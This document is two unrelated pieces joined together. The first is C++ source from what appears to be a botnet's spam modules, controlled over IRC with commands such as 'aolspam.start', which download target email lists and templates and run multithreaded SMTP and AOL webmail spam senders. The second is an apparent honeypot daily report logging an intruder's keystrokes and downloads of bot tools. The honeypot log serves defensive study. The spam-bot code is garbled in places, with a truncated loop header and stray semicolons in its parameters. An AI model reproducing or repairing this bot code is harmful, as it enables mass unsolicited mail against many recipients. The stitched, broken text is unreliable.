g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
"Stopped spamming.", pMsg->sReplyTo.Str());
return true; }
return false;
}
void CSMTP_Logic::SetList(CString &sURL;) {
try {
url uURL;
CDownloadHelper *pDldHlp=new CDownloadHelper;
if(!ParseURL(sURL, &uURL;)) return;
pDldHlp->m_sHost.Assign(uURL.sHost); pDldHlp->m_sPath.Assign(uURL.sReq);
pDldHlp->m_sTarget.Assign("list.tmp"); pDldHlp->m_sReplyTo.Assign("");
pDldHlp->m_bExecute=false; pDldHlp->m_bUpdate=false; pDldHlp->m_bFTP=false;
pDldHlp->m_bSilent=true; pDldHlp->m_bNotice=false; pDldHlp->m_bJoin=false;
pDldHlp->Run(); delete pDldHlp;
FILE *fp=fopen("list.tmp", "rb");
if(!fp) return;
int iFileSize=GetFileSize(fp);
char *szList=new char[iFileSize+1];
memset(szList, 0, iFileSize+1);
fread(szList, sizeof(char), iFileSize, fp);
CString sList(szList); char *szListCopy=sList.Str(), *szTemp;
while(true) {
char *szCRLF=strstr(szListCopy, "\r");
if(!szCRLF) szCRLF=strstr(szListCopy, "\n");
if(!szCRLF) break;
while(*szCRLF=='\r') { *szCRLF='\0'; szCRLF++; }
while(*szCRLF=='\n') { *szCRLF='\0'; szCRLF++; }
while(*szCRLF=='\r') { *szCRLF='\0'; szCRLF++; }
char *szToken=szListCopy; szListCopy=szCRLF;
if(!strcmp(szToken, "")) continue;
m_lEmails.push_back(CString(szToken)); }
delete [] szList; fclose(fp);
DeleteFile("list.tmp");
#ifdef PtW32CatchAll
} PtW32CatchAll {
#else
} catch(...) {
#endif
// Bla
}
}
void CSMTP_Logic::SetTemplate(CString &sURL;) {
try {
url uURL;
CDownloadHelper *pDldHlp=new CDownloadHelper;
if(!ParseURL(sURL, &uURL;)) return;
pDldHlp->m_sHost.Assign(uURL.sHost); pDldHlp->m_sPath.Assign(uURL.sReq);
pDldHlp->m_sTarget.Assign("template.tmp"); pDldHlp->m_sReplyTo.Assign("");
pDldHlp->m_bExecute=false; pDldHlp->m_bUpdate=false; pDldHlp->m_bFTP=false;
pDldHlp->m_bSilent=true; pDldHlp->m_bNotice=false; pDldHlp->m_bJoin=false;
pDldHlp->Run(); delete pDldHlp;
FILE *fp=fopen("template.tmp", "rb");
if(!fp) return;
int iFileSize=GetFileSize(fp);
char *szTemplate=new char[iFileSize+1];
memset(szTemplate, 0, iFileSize+1);
while(!feof(fp)) {
fgets(szTemplate, iFileSize, fp);
CString sTemplate(szTemplate);
if(sTemplate.Find('\r', 0)) {
sTemplate[sTemplate.Find('\r', 0)-1]='\0';
}
if(sTemplate.Find('\n', 0)) {
sTemplate[sTemplate.Find('\n', 0)-1]='\0';
}
if(!sTemplate.Mid(0, 4).Compare("data")) break;
if(!sTemplate.Token(0, " ").Compare("from")) {
m_sEmailSrc.Assign(sTemplate.Token(1, " ", true));
}
if(!sTemplate.Token(0, " ").Compare("from_full")) {
m_sEmailSrcFull.Assign(sTemplate.Token(1, " ", true));
}
if(!sTemplate.Token(0, " ").Compare("subject")) {
m_sSubject.Assign(sTemplate.Token(1, " ", true));
}
}
CString sDataTmp("");
while(!feof(fp)) {
fgets(szTemplate, iFileSize, fp);
CString sTemplate(szTemplate);
if(sTemplate.Find('\r', 0)) {
sTemplate[sTemplate.Find('\r', 0)-1]='\0';
}
if(sTemplate.Find('\n', 0)) {
sTemplate[sTemplate.Find('\n', 0)-1]='\0';
}
sDataTmp.Append(sTemplate); sDataTmp.Append("\r\n");
}
m_sData.Assign(sDataTmp);
m_sEmailTemplate.Assign("");
delete [] szTemplate; fclose(fp);
DeleteFile("template.tmp");
m_bTemplateSet=true;
#ifdef PtW32CatchAll
} PtW32CatchAll {
#else
} catch(...) {
#endif
// Bla
}
}
void *CSMTP_Logic::Run() {
return NULL;
while(true) {
try {
int iNumThreads=spam_maxthreads.iValue;
CSMTP_Sender *pSenders=new CSMTP_Sender[iNumThreads];
// Spam loop
while(m_bSpamming && m_bTemplateSet) {
// Loop through all available threads
for(int i=0; i<1) {
SetList(m_sListURL); Sleep(1000); }
// Get the values
CString sEmailSrc=m_sEmailSrc;
CString sEmailSrcFull=m_sEmailSrcFull;
CString sEmailAddress=m_lEmails.front(); m_lEmails.pop_front();
CString sSubject=m_sSubject;
CString sData=m_sData;
CString sSMTPHost=sEmailAddress.Token(1, "@");
// Resolve the MX
CDNS cDNS; CString sDNS=cDNS.ResolveMX(sSMTPHost.CStr());
// Fall back to A record in case this failed
if(!sDNS.Compare("")) sDNS.Assign(sSMTPHost);
if(pSenders[i].m_bFinished) {
pSenders[i].SetMail(sEmailSrc, sEmailSrcFull, sEmailAddress, sSubject, sData);
pSenders[i].SetServer(sDNS, 25); pSenders[i].Start(false);
}
}
}
delete [] pSenders; Sleep(2000);
#ifdef PtW32CatchAll
} PtW32CatchAll {
#else
} catch(...) {
#endif
// Bla
}
}
return NULL;
}
CAOL_Logic::CAOL_Logic() {
m_szType="CAOL_Logic";
m_lEmails.clear(); m_sEmailTemplate.Assign(""); m_bSpamming=false; m_bTemplateSet=false;
}
CAOL_Logic::~CAOL_Logic() {
m_lEmails.clear(); m_sEmailTemplate.Assign(""); m_bSpamming=false; m_bTemplateSet=false;
}
void CAOL_Logic::Init() {
REGCMD(m_cmdSetList, "aolspam.setlist", "aol - downloads an email list", false, this);
REGCMD(m_cmdSetTemplate, "aolspam.settemplate", "aol - downloads an email template", false, this);
REGCMD(m_cmdSetUser, "aolspam.setuser", "aol - sets an username", false, this);
REGCMD(m_cmdSetPass, "aolspam.setpass", "aol - sets a password", false, this);
REGCMD(m_cmdStart, "aolspam.start", "aol - starts the spamming", false, this);
REGCMD(m_cmdStop, "aolspam.stop", "aol - stops the spamming", false, this);
REGCVAR(aolspam_maxthreads, "8", "AOL Spam Logic - Number of threads", false, 0);
}
bool CAOL_Logic::HandleCommand(CMessage *pMsg) {
if(!pMsg->sCmd.Compare("aolspam.setlist")) {
m_sListURL.Assign(pMsg->sChatString.Token(1, " "));
g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
"Downloading new email list.", pMsg->sReplyTo.Str());
SetList(m_sListURL);
g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
"Finished downloading new email list.", pMsg->sReplyTo.Str());
return true;
}
else if(!pMsg->sCmd.Compare("aolspam.settemplate")) {
m_sTemplateURL.Assign(pMsg->sChatString.Token(1, " "));
g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
"Downloading new email template.", pMsg->sReplyTo.Str());
SetTemplate(m_sTemplateURL);
g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
"Finished downloading new email template.", pMsg->sReplyTo.Str());
return true;
}
if(!pMsg->sCmd.Compare("aolspam.setuser")) {
SetUser(pMsg->sChatString.Token(1, " "));
return true;
}
else if(!pMsg->sCmd.Compare("aolspam.setpass")) {
SetPassword(pMsg->sChatString.Token(1, " "));
return true;
}
else if(!pMsg->sCmd.Compare("aolspam.start")) {
m_bSpamming=true;
g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
"Started spamming.", pMsg->sReplyTo.Str());
return true;
}
else if(!pMsg->sCmd.Compare("aolspam.stop")) {
m_bSpamming=false;
g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
"Stopped spamming.", pMsg->sReplyTo.Str());
return true;
}
return false;
}
void CAOL_Logic::SetList(CString &sURL;) {
try {
url uURL;
CDownloadHelper *pDldHlp=new CDownloadHelper;
if(!ParseURL(sURL, &uURL;)) return;
pDldHlp->m_sHost.Assign(uURL.sHost); pDldHlp->m_sPath.Assign(uURL.sReq);
pDldHlp->m_sTarget.Assign("list.tmp"); pDldHlp->m_sReplyTo.Assign("");
pDldHlp->m_bExecute=false; pDldHlp->m_bUpdate=false; pDldHlp->m_bFTP=false;
pDldHlp->m_bSilent=true; pDldHlp->m_bNotice=false; pDldHlp->m_bJoin=false;
pDldHlp->Run(); delete pDldHlp;
FILE *fp=fopen("list.tmp", "rb");
if(!fp) return;
int iFileSize=GetFileSize(fp);
char *szList=new char[iFileSize+1];
memset(szList, 0, iFileSize+1);
fread(szList, sizeof(char), iFileSize, fp);
CString sList(szList); char *szListCopy=sList.Str(), *szTemp;
while(true) {
char *szCRLF=strstr(szListCopy, "\r");
if(!szCRLF) szCRLF=strstr(szListCopy, "\n");
if(!szCRLF) break;
while(*szCRLF=='\r') { *szCRLF='\0'; szCRLF++; }
while(*szCRLF=='\n') { *szCRLF='\0'; szCRLF++; }
while(*szCRLF=='\r') { *szCRLF='\0'; szCRLF++; }
char *szToken=szListCopy; szListCopy=szCRLF;
if(!strcmp(szToken, "")) continue;
m_lEmails.push_back(CString(szToken));
}
delete [] szList; fclose(fp);
DeleteFile("list.tmp");
#ifdef PtW32CatchAll
} PtW32CatchAll {
#else
} catch(...) {
#endif
// Bla
}
}
void CAOL_Logic::SetTemplate(CString &sURL;) {
try {
url uURL;
CDownloadHelper *pDldHlp=new CDownloadHelper;
if(!ParseURL(sURL, &uURL;)) return;
pDldHlp->m_sHost.Assign(uURL.sHost); pDldHlp->m_sPath.Assign(uURL.sReq);
pDldHlp->m_sTarget.Assign("template.tmp"); pDldHlp->m_sReplyTo.Assign("");
pDldHlp->m_bExecute=false; pDldHlp->m_bUpdate=false; pDldHlp->m_bFTP=false;
pDldHlp->m_bSilent=true; pDldHlp->m_bNotice=false; pDldHlp->m_bJoin=false;
pDldHlp->Run(); delete pDldHlp;
FILE *fp=fopen("template.tmp", "rb");
if(!fp) return;
int iFileSize=GetFileSize(fp);
char *szTemplate=new char[iFileSize+1];
memset(szTemplate, 0, iFileSize+1);
while(!feof(fp)) {
fgets(szTemplate, iFileSize, fp);
CString sTemplate(szTemplate);
if(sTemplate.Find('\r', 0)) {
sTemplate[sTemplate.Find('\r', 0)-1]='\0';
}
if(sTemplate.Find('\n', 0)) {
sTemplate[sTemplate.Find('\n', 0)-1]='\0';
}
if(!sTemplate.Mid(0, 4).Compare("data")) break;
if(!sTemplate.Token(0, " ").Compare("from")) {
m_sEmailSrc.Assign(sTemplate.Token(1, " ", true));
}
if(!sTemplate.Token(0, " ").Compare("from_full")) {
m_sEmailSrcFull.Assign(sTemplate.Token(1, " ", true));
}
if(!sTemplate.Token(0, " ").Compare("subject")) {
m_sSubject.Assign(sTemplate.Token(1, " ", true));
}
}
CString sDataTmp("");
while(!feof(fp)) {
fgets(szTemplate, iFileSize, fp);
CString sTemplate(szTemplate);
if(sTemplate.Find('\r', 0)) {
sTemplate[sTemplate.Find('\r', 0)-1]='\0';
}
if(sTemplate.Find('\n', 0)) {
sTemplate[sTemplate.Find('\n', 0)-1]='\0';
}
sDataTmp.Append(sTemplate); sDataTmp.Append("\r\n");
}
m_sData.Assign(sDataTmp);
m_sEmailTemplate.Assign("");
delete [] szTemplate; fclose(fp);
DeleteFile("template.tmp");
m_bTemplateSet=true;
#ifdef PtW32CatchAll
} PtW32CatchAll {
#else
} catch(...) {
#endif
// Bla
}
}
void CAOL_Logic::SetUser(CString &sUser;) {
m_sUser.Assign(sUser);
}
void CAOL_Logic::SetPassword(CString &sPass;) {
m_sPass.Assign(sPass);
}
void *CAOL_Logic::Run() {
return NULL;
while(true) {
try {
int iNumThreads=aolspam_maxthreads.iValue;
CAOLWebMail *pSenders=new CAOLWebMail[iNumThreads];
// Spam loop
while(m_bSpamming && m_bTemplateSet) {
// Loop through all available threads
for(int i=0; i<1) {
SetList(m_sListURL); Sleep(1000); }
// Get the values
CString sEmailSrc=m_sEmailSrc;
CString sEmailSrcFull=m_sEmailSrcFull;
CString sEmailAddress=m_lEmails.front(); m_lEmails.pop_front();
CString sSubject=m_sSubject;
CString sData=m_sData;
pSenders[i].SetMail(sEmailSrc, sEmailSrcFull, sEmailAddress, sSubject, sData);
pSenders[i].Start(false);
}
}
delete [] pSenders; Sleep(2000);
#ifdef PtW32CatchAll
} PtW32CatchAll {
#else
} catch(...) {
#endif
// Bla
}
}
return NULL;
}
CAOLWebMail::CAOLWebMail() { m_szType="CAOLWebMail"; m_bMailSet=false; m_bFinished=true; }
CAOLWebMail::~CAOLWebMail() { m_bMailSet=false; m_bFinished=true; }
void *CAOLWebMail::Run() {
m_bFinished=false;
while(!m_bMailSet) Sleep(1000);
Send();
m_bFinished=true;
return NULL;
}
void CAOLWebMail::SetMail(CString sMailFrom, CString sMailFromFull, \
CString sRcptTo, CString sSubject, \
CString sData) {
m_sMailFrom=sMailFrom; m_sMailFromFull=sMailFromFull;
m_sRcptTo=sRcptTo; m_sSubject=sSubject; m_sData=sData;
m_bMailSet=true;
}
================================================================================
Date: 20040802
Splitting data into pcap files for each honeypot, please wait (20040802):
-------------------------------------------------------------------------
Pot: 10.2.1.145 [ 5732 EVENTS ]
Pot: 10.2.1.146 [ 40635 EVENTS ]
Pot: 10.2.1.147 [ 2648 EVENTS ]
Outbound HTTP GETs to TCP port 80 (20040802):
---------------------------------------------
Pot: 10.2.1.145 [ 0 HTTP GETs ]
Pot: 10.2.1.146 [ 10 HTTP GETs ]
13228 2004-08-02 17:16:35.393855 10.2.1.146 -> 64.202.XXX.XXX HTTP GET /x/qd HTTP/1.0
16191 2004-08-02 20:10:36.677479 10.2.1.146 -> 64.202.XXX.XXX HTTP GET /x/qd HTTP/1.0
16309 2004-08-02 20:11:17.559758 10.2.1.146 -> 213.218.XXX.XXX HTTP GET /Arhive/p.tar.gz HTTP/1.0
25708 2004-08-02 20:22:39.019922 10.2.1.146 -> 66.218.XXX.XXX HTTP GET /sslstop.tar.gz HTTP/1.0
25815 2004-08-02 20:22:53.337162 10.2.1.146 -> 213.218.XXX.XXX HTTP GET /Arhive/psy.tgz HTTP/1.0
27077 2004-08-02 20:37:13.767699 10.2.1.146 -> 213.218.XXX.XXX HTTP GET /Arhive/pico.tgz HTTP/1.0
31515 2004-08-02 21:10:13.493600 10.2.1.146 -> 213.218.XXX.XXX HTTP GET /Arhive/socklist.tgz HTTP/1.0
31923 2004-08-02 21:16:28.377246 10.2.1.146 -> 212.15.XXX.XXX HTTP GET /cgi-bin/tek HTTP/1.0
32168 2004-08-02 21:23:09.818275 10.2.1.146 -> 213.218.XXX.XXX HTTP GET /Arhive/mech.tgz HTTP/1.0
Pot: 10.2.1.147 [ 0 HTTP GETs ]
FTP GETs to TCP port 20 (20040802):
-----------------------------------
Pot: 10.2.1.145 [ 0 FTP GETs ]
Pot: 10.2.1.146 [ 0 FTP GETs ]
Pot: 10.2.1.147 [ 0 FTP GETs ]
IRC privmsg messages (20040802):
--------------------------------
Pot: 10.2.1.145 [ 0 IRC messages ]
Pot: 10.2.1.146 [ 613 IRC messages ]
CNOTICE Ede.NL.eu.example.org CNOTICE SILENCE=15 MODES=6 MAXCHANNELS=20 NICKLEN=12 MAXNICKLEN=15 :are supported by this server
#TheExample Crystal!~Case@Creature.users.example.org TaLenT_ nick Mirabela
#TheExample Crystal!~Case@Creature.users.example.org GesT_ nick Mirabela
#TheExample Crystal!~Case@Creature.users.example.org _aLenT___ nick Gagica
#TheExample Crystal!~Case@Creature.users.example.org GesT__ nick Roscata
#TheExample Crystal!~Case@Creature.users.example.org GesT___ nick Maimuta
#TheExample Crystal!~Case@Creature.users.example.org GesT_ nick GaOz
#TheExample Crystal!~Case@Creature.users.example.org TaLenT___ nick Salbatica
#TheExample Crystal!~Case@Creature.users.example.org Belea_ nick Bronzata
#TheExample Crystal!~Case@Creature.users.example.org Belea___ nick Creatza
Pot: 10.2.1.147 [ 0 IRC messages ]
Sebek keystroke logs (20040802):
--------------------------------
Pot: 10.2.1.145 [ 12 Sebek records ]
Pot: 10.2.1.146 [ 54 Sebek records ]
[2004-08-02 15:23:16 10.2.1.146 20025 bash/sh 48]TERdcfl=
[2004-08-02 15:23:16 10.2.1.146 20025 bash 48]uname;
[2004-08-02 18:17:18 10.2.1.146 20444 bash/sh 48]TERmd b
[2004-08-02 18:17:18 10.2.1.146 20444 bash 48]unam;i
[2004-08-02 18:17:34 10.2.1.146 20444 bash 48]cd tls
[2004-08-02 18:17:37 10.2.1.146 20444 bash 48]cd ls
[2004-08-02 18:17:43 10.2.1.146 20444 bash 48]cd /ls
[2004-08-02 18:17:57 10.2.1.146 20444 bash 48]wgetmtar
[2004-08-02 18:28:09 10.2.1.146 20473 bash 0]sockwgetrtar./sels
[2004-08-02 18:28:35 10.2.1.146 26994 bash 0]ls
[2004-08-02 18:28:42 10.2.1.146 26994 bash 0]cd .var.t[BS][BS][BS][BS][BS][BS]/ca[BS][BS]var/tmp
[2004-08-02 18:28:42 10.2.1.146 26994 bash 0]ks
[2004-08-02 18:28:44 10.2.1.146 26994 bash 0]ls
[2004-08-02 18:29:07 10.2.1.146 26994 bash 0]wgetmsa
[2004-08-02 18:29:16 10.2.1.146 26994 bash 0]tar tcd st
[2004-08-02 18:29:19 10.2.1.146 26994 bash 0]./ss
[2004-08-02 18:29:19 10.2.1.146 26990 sendmail 0]lsc.var.t/cavar/tmpksls
[2004-08-02 18:29:21 10.2.1.146 26994 bash 0]cd ..
[2004-08-02 18:29:27 10.2.1.146 26994 bash 0]wgetrcit
[2004-08-02 18:32:26 10.2.1.146 26994 bash 0]tar cd .ls
[2004-08-02 18:32:30 10.2.1.146 26994 bash 0]pico psybc
[2004-08-02 18:33:19 10.2.1.146 26994 bash 0]wgetdx.
[2004-08-02 18:40:09 10.2.1.146 26994 bash 0]wget XXX/picog
[2004-08-02 18:40:32 10.2.1.146 26994 bash 0]cds [BS][BS] ..
[2004-08-02 18:40:38 10.2.1.146 26994 bash 0]wgetroeg
[2004-08-02 18:57:10 10.2.1.146 26994 bash 0]tar vt
[2004-08-02 18:57:13 10.2.1.146 26994 bash 0]mv p /
[2004-08-02 18:57:15 10.2.1.146 26994 bash 0]ls
[2004-08-02 18:57:18 10.2.1.146 26994 bash 0]cd
[2004-08-02 18:57:19 10.2.1.146 26994 bash 0]ls
[2004-08-02 18:57:28 10.2.1.146 26994 bash 0]picoar
[2004-08-02 19:11:41 10.2.1.146 26994 bash 0]w[BS]cd /var/tmp
[2004-08-02 19:11:42 10.2.1.146 26994 bash 0]ls
[2004-08-02 19:12:04 10.2.1.146 26994 bash 0]c[BS]ww[BS]get XXX[BS].com/Arhv[BS]ive/\[BS][BS][BS][BS][BS][BS]hive/socklist.tgz
[2004-08-02 19:18:10 10.2.1.146 26994 bash 0]tar v
[2004-08-02 19:18:13 10.2.1.146 26994 bash 0]tar fsock.
[2004-08-02 19:18:15 10.2.1.146 26994 bash 0]mv slr
[2004-08-02 19:18:18 10.2.1.146 26994 bash 0]socklist
[2004-08-02 19:21:29 10.2.1.146 26994 bash 0]ps nx[BS][BS]ax
[2004-08-02 19:21:50 10.2.1.146 26994 bash 0]wget-.vt
[2004-08-02 19:29:56 10.2.1.146 26990 sendmail 0].lspico cd .lscdlswcd /var/tmplscwwget XXX/.com/Arhvive/\hive/socklist.tgzsocklistps nxax
[2004-08-02 19:30:31 10.2.1.146 26994 bash 0]tar mcd e./mecd ..
[2004-08-02 19:30:32 10.2.1.146 26994 bash 0]ls
[2004-08-02 19:30:34 10.2.1.146 26994 bash 0]rm -rf *z
[2004-08-02 19:30:36 10.2.1.146 26994 bash 0]rm -rf p
[2004-08-02 19:30:38 10.2.1.146 26994 bash 0]rm -rf p.c
[2004-08-02 19:30:46 10.2.1.146 26994 bash 0]rm -rf sto[BS][BS]slstop
[2004-08-02 19:30:47 10.2.1.146 26994 bash 0]ls
Pot: 10.2.1.147 [ 18 Sebek records ]
[2004-08-02 15:22:15 10.2.1.147 5039 sshd 0]SSH-2.0-libssh-0.1
[2004-08-02 15:22:16 10.2.1.147 5040 sshd 0]SSH-2.0-libssh-0.1
[2004-08-02 15:22:18 10.2.1.147 5041 sshd 0]SSH-2.0-libssh-0.1
[2004-08-02 15:22:19 10.2.1.147 5042 sshd 0]SSH-2.0-libssh-0.1
[2004-08-02 15:22:21 10.2.1.147 5043 sshd 0]SSH-2.0-libssh-0.1
[2004-08-02 15:22:22 10.2.1.147 5044 sshd 0]SSH-2.0-libssh-0.1
[2004-08-02 15:22:24 10.2.1.147 5045 sshd 0]SSH-2.0-libssh-0.1
[2004-08-02 15:22:25 10.2.1.147 5046 sshd 0]SSH-2.0-libssh-0.1
[2004-08-02 15:22:27 10.2.1.147 5047 sshd 0]SSH-2.0-libssh-0.1
Re-assembling interesting TCP streams (20040802):
-------------------------------------------------
Pot: 10.2.1.145 [ 6 interesting TCP streams ]
Pot: 10.2.1.146 [ 32 interesting TCP streams ]
Pot: 10.2.1.147 [ 5 interesting TCP streams ]
Extracted files downloaded by HTTP (20040802):
----------------------------------------------
/tmp/output/20040802/10.2.1.146/extracted_files/213.218.XXX.XXX/session_2619/p.tar.gz
/tmp/output/20040802/10.2.1.146/extracted_files/213.218.XXX.XXX/session_2673/psy.tgz
/tmp/output/20040802/10.2.1.146/extracted_files/213.218.XXX.XXX/session_2723/pico.tgz
/tmp/output/20040802/10.2.1.146/extracted_files/213.218.XXX.XXX/session_4384/socklist.tgz
/tmp/output/20040802/10.2.1.146/extracted_files/66.218.XXX.XXX/session_2670/sslstop.tar.gz
/tmp/output/20040802/10.2.1.146/extracted_files/213.218.XXX.XXX/session_4440/mech.tgz
Extracted files downloaded by FTP (20040802):
---------------------------------------------
<none>
================================================================================